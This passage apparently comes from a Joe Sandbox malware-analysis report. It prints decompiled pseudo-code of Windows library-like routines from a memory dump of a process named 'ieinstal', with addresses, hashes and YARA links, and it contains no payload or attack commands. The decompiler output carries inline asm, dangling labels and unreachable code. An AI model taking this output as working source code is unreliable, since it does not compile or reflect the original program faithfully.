				signed int _t39;

				_t29 = __ecx;
				_push(__ecx);
				_t26 = _a4;
				if((_t26 & 0xfffe7ffe) != 0) {
					L3:
					_t16 = 0xc000000d;
					L4:
					return _t16;
				}
				if((_t26 & 0x00000001) == 0) {
					_t15 = _t26 & 0x00018000;
					__eflags = (_t26 & 0x00018000) - 0x10000;
					if((_t26 & 0x00018000) != 0x10000) {
						goto L3;
					}
					L6:
					_t18 = L1EFD2330(_t15, 0x1f0b69f0);
					asm("bt dword [0x1f0b6908], 0xf");
					_t30 = _t29 & 0xffffff00 | __eflags > 0x00000000;
					asm("bt ebx, 0xf");
					_t19 = _t18 & 0xffffff00 | __eflags >= 0x00000000;
					__eflags = _t19 & _t30;
					if((_t19 & _t30) == 0) {
						 *0x1f0b6908 = _t26;
						_t39 = 0;
						__eflags = 0;
					} else {
						_t39 = 0xc0000022;
					}
					_t20 = E1EFD24D0(0x1f0b69f0);
					__eflags = _t39;
					if(_t39 >= 0) {
						L1EFD2330(_t20, 0x1f0b67c4);
						_t36 = E1EFFD532(0x1f0b4fe4);
						E1EFD24D0(0x1f0b67c4);
						__eflags = _t36;
						if(_t36 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
						}
					}
					_t16 = _t39;
					goto L4;
				}
				if((_t26 & 0x00010000) == 0) {
					goto L6;
				}
				goto L3;
			}

0x1f04ced0
0x1f04ced8
0x1f04ceda
0x1f04cee5
0x1f04cef4
0x1f04cef4
0x1f04cef9
0x1f04ceff
0x1f04ceff
0x1f04ceea
0x1f04cf04
0x1f04cf09
0x1f04cf0e
0x00000000
0x00000000
0x1f04cf10
0x1f04cf16
0x1f04cf1b
0x1f04cf23
0x1f04cf26
0x1f04cf2a
0x1f04cf2d
0x1f04cf2f
0x1f04cf38
0x1f04cf3e
0x1f04cf3e
0x1f04cf31
0x1f04cf31
0x1f04cf31
0x1f04cf41
0x1f04cf46
0x1f04cf48
0x1f04cf50
0x1f04cf60
0x1f04cf62
0x1f04cf67
0x1f04cf69
0x1f04cf78
0x1f04cf78
0x1f04cf69
0x1f04cf7d
0x00000000
0x1f04cf7d
0x1f04cef2
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2827f52c971b122d08934eb9a5ee4c891c3b52191af41f9eec9e50db1c4a2d4
Instruction ID: 504038696735b89875102216cb1cae883a205fa973fbf9c33c7d3a6f0dd253a6
Opcode Fuzzy Hash: f2827f52c971b122d08934eb9a5ee4c891c3b52191af41f9eec9e50db1c4a2d4
Instruction Fuzzy Hash: B401667F300A8063D321C6268C90B9B3598EB85A74F74823ABD145B281DE2DBC8182E0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEAF72 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1EFEAF72(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _t12;
				void* _t14;
				void* _t22;
				signed int _t28;
				intOrPtr _t31;
				void* _t33;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t12 =  *((intOrPtr*)(_t31 + 0x48));
				_v8 = _t12;
				if(_t12 == 0) {
					_t28 = 4;
					_t14 = E1EFEAD20(0,  &_v12, _t28);
					if(_t14 >= 0) {
						_t22 = _v12;
						goto L3;
					}
				} else {
					_t28 = E1EFEBA17(_t12, 1);
					_t23 = _t28;
					_t22 = E1EFEB9FA(_t28);
					if(_t22 == 0) {
						_t14 = 0xc000009a;
					} else {
						E1F0088C0(_t22, _v8, _t28);
						_t33 = _t33 + 0xc;
						L3:
						 *((intOrPtr*)(_t31 + 0x294)) =  *((intOrPtr*)(_t31 + 0x294)) + 1;
						 *((intOrPtr*)(_t31 + 0x48)) = _t22;
						 *((intOrPtr*)(_t31 + 0x290)) = _t28;
						E1F008F40(0x1f0b63a0, 0, 0x234);
						E1EFEAFF1(_t23);
						_t14 = 0;
					}
				}
				return _t14;
			}

0x1efeaf72
0x1efeaf77
0x1efeaf78
0x1efeaf82
0x1efeaf85
0x1efeaf88
0x1efeaf8d
0x1f02e261
0x1f02e269
0x1f02e270
0x1f02e276
0x00000000
0x1f02e276
0x1efeaf93
0x1efeaf9d
0x1efeaf9f
0x1efeafa6
0x1efeafaa
0x1efeafe8
0x1efeafac
0x1efeafb1
0x1efeafb6
0x1efeafb9
0x1efeafb9
0x1efeafcb
0x1efeafce
0x1efeafd4
0x1efeafdc
0x1efeafe1
0x1efeafe1
0x1efeafaa
0x1efeafe7

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43103850d664f3bd79e494f1d3f5adcab1073627d32defab82898deeabc4dde
Instruction ID: bc78e203d52298447bde5452944f845521352b23cf911290cfcd1e3995281457
Opcode Fuzzy Hash: c43103850d664f3bd79e494f1d3f5adcab1073627d32defab82898deeabc4dde
Instruction Fuzzy Hash: 7E01F9BA7007846BD714EBAA9C90F6FB7F8DBC4654F01067AEA06D7540EB70FD058660

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB7CF1 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1EFB7CF1(void* __ecx, intOrPtr* __edx) {
				void* _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					L1EFD2330(_t6, 0x1f0b6718);
				}
				_t29 = L1EFB7D7A(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E1EFD24D0(0x1f0b6718);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x1efb7cf6
0x1efb7cf8
0x1efb7d01
0x1efb7d04
0x1efb7d04
0x1efb7d10
0x1efb7d14
0x1efb7d42
0x1efb7d44
0x1efb7d47
0x1efb7d47
0x1efb7d4e
0x00000000
0x1efb7d50
0x1efb7d52
0x00000000
0x00000000
0x1efb7d5f
0x00000000
0x1efb7d5f
0x1efb7d16
0x1efb7d16
0x1efb7d1b
0x1efb7d6a
0x1efb7d6a
0x1efb7d6d
0x1efb7d6f
0x1efb7d6f
0x1efb7d64
0x00000000
0x1efb7d64
0x1efb7d1d
0x1efb7d22
0x00000000
0x00000000
0x1efb7d24
0x1efb7d26
0x1efb7d3d
0x00000000
0x1efb7d3d

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0dab7419ea4e9401a8e9adf97ed37ef97bbc14e3e12e55f36ba945f59b893d9
Instruction ID: f677e0feecd7f641b2d57853eee525bfc97d7388fb1f4fd00e8188251054b765
Opcode Fuzzy Hash: d0dab7419ea4e9401a8e9adf97ed37ef97bbc14e3e12e55f36ba945f59b893d9
Instruction Fuzzy Hash: 0201CC765216919BC3279F16C8709277BA7EFCAB9071D835AEC458B345D730D801C790

Uniqueness

Uniqueness Score: -1.00%

Function 1F056E30 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1F056E30(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E1F002DC0();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E1F002A60();
					if( *_t27 != 0) {
						_push( *_t27);
						E1F002A80();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E1F002A80();
				return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x1f056e38
0x1f056e3d
0x1f056e46
0x1f056e48
0x1f056e49
0x1f056e4a
0x1f056e4b
0x1f056e4e
0x1f056e4f
0x1f056e51
0x1f056e56
0x1f056e56
0x1f056e5c
0x1f056e5e
0x1f056e60
0x1f056e60
0x1f056e63
0x1f056e64
0x1f056e66
0x1f056e68
0x1f056e6f
0x1f056e71
0x1f056e73
0x1f056e73
0x1f056e6f
0x1f056e78
0x1f056e7e
0x1f056e8d
0x1f056e8d
0x1f056e92
0x1f056e94
0x1f056ead

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
Instruction ID: 312e7ce6a18aa38cbe821675bcd980ad7a186e4009f9ec86f8fa6e0f817ed56d
Opcode Fuzzy Hash: aa0e8ad1fd9cf952fb7734a090ea498649bc36d7f311b36011489c6a9e7816af
Instruction Fuzzy Hash: 8A018CB6141645BFE721DF61CC90EA7FBBEFF54790B100625F21542560CB61FCA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F03DE50 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1F03DE50(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _t17;
				intOrPtr _t23;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t34;

				_push(__ecx);
				_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t34 = _a4;
				_t17 = E1EFEB870(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t34);
				E1EFCFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				E1F008F40(0x1f0b63a0, 0, 0x234);
				 *((intOrPtr*)(_t28 + 0x294)) =  *((intOrPtr*)(_t28 + 0x294)) + 1;
				_v8 =  *((intOrPtr*)(_t28 + 0x48));
				 *((intOrPtr*)(_t28 + 0x48)) = _t34;
				 *((intOrPtr*)(_t28 + 0x290)) = _t17;
				E1EFCE740( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x1c)), __edi, __esi, __ebx);
				_t32 = _a8;
				_t23 = _v8;
				if(_t32 == 0) {
					if(_t23 != 0) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t23);
					}
				} else {
					 *_t32 = _t23;
				}
				return 0;
			}

0x1f03de55
0x1f03de5f
0x1f03de68
0x1f03de71
0x1f03de82
0x1f03de93
0x1f03de9e
0x1f03dea4
0x1f03dead
0x1f03deb0
0x1f03deb9
0x1f03debe
0x1f03dec1
0x1f03dec9
0x1f03ded1
0x1f03dedf
0x1f03dedf
0x1f03decb
0x1f03decb
0x1f03decb
0x1f03dee7

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057163742530588a572e4b4584b39b578339ccd1e0ec4b3c143933bbb0444e1b
Instruction ID: d969832a93b2d5195ca93de4fb2b8743c53959131d640734f37eea828a04231a
Opcode Fuzzy Hash: 057163742530588a572e4b4584b39b578339ccd1e0ec4b3c143933bbb0444e1b
Instruction Fuzzy Hash: E4117C36642644EFCB15DF19C990F567BB9FF44B44F2004A6E9058B661C735ED01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF6CC0 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1EFF6CC0(void* __ecx, void* __eflags, signed short* _a4, char* _a8) {
				short _v12;
				void* _t16;
				short _t20;
				char* _t28;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				E1EFDDF36(0, _a4, 0x14d0);
				_t28 = _a8;
				_t32 = E1EFE015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _a4, 0, _t28,  &_v12);
				if(_t32 < 0 ||  *_t28 == 0) {
					_t20 = 0x14d3;
				} else {
					_t20 = (0 | _v12 == 0x00000000) + 0x14d1;
				}
				E1EFDDF36(0, _a4, _t20);
				if(_t32 < 0) {
					_t16 = _t32;
				} else {
					if(_v12 == 0) {
						if( *_t28 != 0) {
							 *_t28 = 0;
						}
					}
					_t16 = 0;
				}
				return _t16;
			}

0x1eff6cc5
0x1eff6cc6
0x1eff6cdc
0x1eff6ce1
0x1eff6cf5
0x1eff6cf9
0x1eff6d37
0x1eff6d00
0x1eff6d09
0x1eff6d09
0x1eff6d15
0x1eff6d1c
0x1eff6d3e
0x1eff6d1e
0x1eff6d23
0x1eff6d30
0x1eff6d32
0x1eff6d32
0x1eff6d30
0x1eff6d25
0x1eff6d25
0x1eff6d2a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction ID: 997c3bf29c6d889d7474bf1e327ebe671815f9cfcc327f5430f2b8dd52b543c2
Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction Fuzzy Hash: 8801D273604259ABDB159F21C431B9E7F65EB40714F02431AEC065B2E0DAB49880C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB6DA6 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1EFB6DA6(char __ecx) {
				void* _v12;
				void* _t15;
				char _t17;
				void* _t21;
				char _t25;
				char _t27;
				intOrPtr* _t31;
				signed int _t32;
				signed int _t33;

				_t33 = _t32 & 0xfffffff8;
				_push(__ecx);
				_t27 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t21 = 0;
					E1EFCFED0(0x1f0b5220);
					_t24 =  *((intOrPtr*)(_t27 + 0x18));
					if(E1F049174( *((intOrPtr*)(_t27 + 0x18))) != 0) {
						L9:
						_push(0x1f0b5220);
						E1EFCE740(_t24);
						_t15 = _t21;
						L2:
						return _t15;
					}
					_t24 = _t27;
					_t21 = E1F048D4D(_t27, _t25);
					if(_t21 < 0) {
						goto L9;
					}
					_t31 =  *0x1f0b5240; // 0x0
					while(_t31 != 0x1f0b5240) {
						_t17 =  *((intOrPtr*)(_t31 + 0x18));
						_t31 =  *_t31;
						 *((intOrPtr*)(_t33 + 0xc)) = _t17;
						if(_t17 != 0) {
							_t24 = _t17;
							 *0x1f0b91e0( *((intOrPtr*)(_t27 + 0x30)),  *((intOrPtr*)(_t27 + 0x18)),  *((intOrPtr*)(_t27 + 0x20)), _t27);
							 *((intOrPtr*)(_t33 + 0x1c))();
						}
					}
					goto L9;
				}
				_t15 = 0;
				goto L2;
			}

0x1efb6dab
0x1efb6dae
0x1efb6dbf
0x1efb6dc1
0x1f019be0
0x1f019be2
0x1f019be7
0x1f019bf1
0x1f019c33
0x1f019c33
0x1f019c38
0x1f019c3d
0x1efb6dc9
0x1efb6dcf
0x1efb6dcf
0x1f019bf3
0x1f019bfa
0x1f019bfe
0x00000000
0x00000000
0x1f019c00
0x1f019c2b
0x1f019c08
0x1f019c0b
0x1f019c0d
0x1f019c13
0x1f019c19
0x1f019c21
0x1f019c27
0x1f019c27
0x1f019c13
0x00000000
0x1f019c2b
0x1efb6dc7
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2cd8fe480423e173e944de61053ad46637d73e3f270e2a8eda0255caae7e90a
Instruction ID: 1f545b3a9a3214e731b6ef37339a34ac8f54ef96c341f4fedb8873a6ba22aef5
Opcode Fuzzy Hash: a2cd8fe480423e173e944de61053ad46637d73e3f270e2a8eda0255caae7e90a
Instruction Fuzzy Hash: 3901F539208606ABC715DF658C8496677F5FF85320B800678F9428B650DB22FC51CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC3BA4 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC3BA4(void* __eax, intOrPtr __ebx, void* __edi, intOrPtr __esi) {
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t37;
				void* _t39;

				_t37 = __esi;
				_t31 = __ebx;
				_t14 = __eax;
				if( *((intOrPtr*)(_t39 - 0x4c)) != __ebx || __edi < 0) {
					if(_t37 == 0) {
						goto L2;
					}
					_t32 =  *((intOrPtr*)(_t39 - 0x24));
					if( *((intOrPtr*)(_t39 - 0x24)) != 0) {
						_t27 =  *0x1f0b6644; // 0x0
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27 + 0xc0000, _t32);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t33 =  *((intOrPtr*)(_t37 + 0x1c));
					if( *((intOrPtr*)(_t37 + 0x1c)) != 0) {
						_t23 =  *0x1f0b6644; // 0x0
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t23 + 0xc0000, _t33);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t34 =  *((intOrPtr*)(_t37 + 0x20));
					if( *((intOrPtr*)(_t37 + 0x20)) != 0) {
						_t19 =  *0x1f0b6644; // 0x0
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t19 + 0xc0000, _t34);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t15 =  *0x1f0b6644; // 0x0
					_t18 = E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t15 + 0xc0000, _t37);
					 *((intOrPtr*)(_t39 - 0x20)) = _t31;
					return _t18;
				} else {
					L2:
					return _t14;
				}
			}

0x1efc3ba4
0x1efc3ba4
0x1efc3ba4
0x1efc3ba7
0x1f01fe9d
0x00000000
0x00000000
0x1f01fea3
0x1f01fea8
0x1f01feaa
0x1f01febf
0x1f01fec4
0x1f01fec4
0x1f01fec7
0x1f01fecc
0x1f01fece
0x1f01fee3
0x1f01fee8
0x1f01fee8
0x1f01feeb
0x1f01fef0
0x1f01fef2
0x1f01ff07
0x1f01ff0c
0x1f01ff0c
0x1f01ff0f
0x1f01ff24
0x1f01ff2b
0x00000000
0x1efc3bb5
0x1efc3bb5
0x1efc3bb5
0x1efc3bb5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a8e94ba5aaae548198cf66eae1ad64527fefb0983997271e99103a43c0574a
Instruction ID: 0e585eb3c029d4ac7764b604f3e66a81d0199af13cb9659fade4792b1f4cc58c
Opcode Fuzzy Hash: f8a8e94ba5aaae548198cf66eae1ad64527fefb0983997271e99103a43c0574a
Instruction Fuzzy Hash: 671136766025509FCB25CF08CDA0FAA77B9FF58608F1A05ACE801AB711C729FC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC1FAA Relevance: .0, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1EFC1FAA(void* __ecx, void* __edx) {
				char* _t14;
				void* _t17;
				unsigned int _t21;
				signed int _t27;
				unsigned int _t29;

				_t17 = __ecx;
				_t29 =  *(__ecx + 0x8c);
				if(__edx == 0) {
					L3:
					_t27 = 0;
				} else {
					while(1) {
						_t27 = _t29 >> 1;
						if(_t27 == 0) {
							goto L3;
						}
						_t21 = _t29;
						asm("lock cmpxchg [edx], esi");
						_t29 = _t21;
						if(_t29 != _t21) {
							continue;
						} else {
							goto L4;
						}
						L13:
					}
					goto L3;
				}
				L4:
				_t3 = _t17 + 0x20; // 0x24
				E1EFEDB40(_t3,  ~_t27, 1);
				if(E1EFD3C40() != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t14 = 0x7ffe0386;
				}
				if( *_t14 != 0) {
					if(_t27 != 0) {
						_t6 = _t17 + 0x78; // 0x7c
						return E1F094AE8( *((intOrPtr*)(_t17 + 0x5c)), _t6,  *((intOrPtr*)(_t17 + 0x30)),  *((intOrPtr*)(_t17 + 0x34)),  *((intOrPtr*)(_t17 + 0x3c)), _t27);
					}
				}
				return _t14;
				goto L13;
			}

0x1efc1fad
0x1efc1fb1
0x1efc1fb9
0x1efc1fcb
0x1efc1fcb
0x1efc1fbb
0x1efc1fc1
0x1efc1fc3
0x1efc1fc5
0x00000000
0x00000000
0x1f01f9fd
0x1f01fa04
0x1f01fa08
0x1f01fa0c
0x00000000
0x1f01fa12
0x00000000
0x1f01fa12
0x00000000
0x1f01fa0c
0x00000000
0x1efc1fc1
0x1efc1fcd
0x1efc1fcf
0x1efc1fd6
0x1efc1fe2
0x1f01fa20
0x1efc1fe8
0x1efc1fe8
0x1efc1fe8
0x1efc1ff0
0x1f01fa2c
0x1f01fa35
0x00000000
0x1f01fa42
0x1f01fa2c
0x1efc1ff9
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
Instruction ID: 7e298407ec59faf478f00f95b0bb04c2ede1602fd70b51ec8681b6408690a42a
Opcode Fuzzy Hash: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
Instruction Fuzzy Hash: 4E0128372001529BDB10DB19D8A0F4677F6BFC8610F2642A9ED148F249EB71EC51D360

Uniqueness

Uniqueness Score: -1.00%

Function 1F045CD0 Relevance: .0, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F045CD0(void* __eflags, void* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				void* _t28;

				E1EFF6B6E(_a4,  &_v36,  &_v12,  &_v32,  &_v8,  &_v28,  &_v16,  &_v24,  &_v20);
				_t25 =  *0x1f0b5d78; // 0x0
				_t40 = _v20 + 0x14 + _v8 + _v12 + _v16;
				_t28 = E1EFD5D90(_v8 + _v12 + _v16,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x140000, _v20 + 0x14 + _v8 + _v12 + _v16);
				 *_a8 = _t28;
				if(_t28 != 0) {
					E1F0088C0(_t28, _a4, _t40);
					return 0;
				}
				return 0xc0000017;
			}

0x1f045cfb
0x1f045d0f
0x1f045d14
0x1f045d26
0x1f045d2e
0x1f045d32
0x1f045d40
0x00000000
0x1f045d48
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346696d19006fa4672870d7e55056f089dc6b88e2e05efb97d66c30eb1a2356d
Instruction ID: e1459717fb6080702c8af3e0178cc7335a52d8aac571f37234ae1583b2a4c0fb
Opcode Fuzzy Hash: 346696d19006fa4672870d7e55056f089dc6b88e2e05efb97d66c30eb1a2356d
Instruction Fuzzy Hash: 8011D777900119EBCB11DB94CC94EEFBBBCEF48254F044566E906A7210EA35EA55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBBFC0 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBBFC0(intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				char* _t12;
				signed int* _t13;
				void* _t19;
				signed int _t27;
				intOrPtr _t29;

				_t29 = _a4;
				_t27 = 0;
				_t12 = E1EFF7128(_t19, _t29, 0, 0);
				if(_t12 == 0) {
					L3:
					return _t12;
				}
				if(_a8 != 0) {
					_t13 = _t29 + 0xa8;
					_t27 =  *_t13;
					 *_t13 = 0;
				}
				_t12 = E1EFEDB40(_t29 + 0x20,  ~_t27, 1);
				if(_t27 != 0) {
					if(E1EFD3C40() == 0) {
						_t12 = 0x7ffe0386;
					} else {
						_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t12 == 0) {
						goto L3;
					}
					return E1F094AE8( *((intOrPtr*)(_t29 + 0x5c)), _t29 + 0x78, _t29 + 0x30,  *((intOrPtr*)(_t29 + 0x34)),  *((intOrPtr*)(_t29 + 0x3c)), _t27);
				} else {
					goto L3;
				}
			}

0x1efbbfc6
0x1efbbfcc
0x1efbbfd1
0x1efbbfd8
0x1efbbffc
0x1efbbffc
0x1efbbffc
0x1efbbfdd
0x1f01d358
0x1f01d35e
0x1f01d35e
0x1f01d35e
0x1efbbfec
0x1efbbff3
0x1f01d36c
0x1f01d37e
0x1f01d36e
0x1f01d377
0x1f01d377
0x1f01d386
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

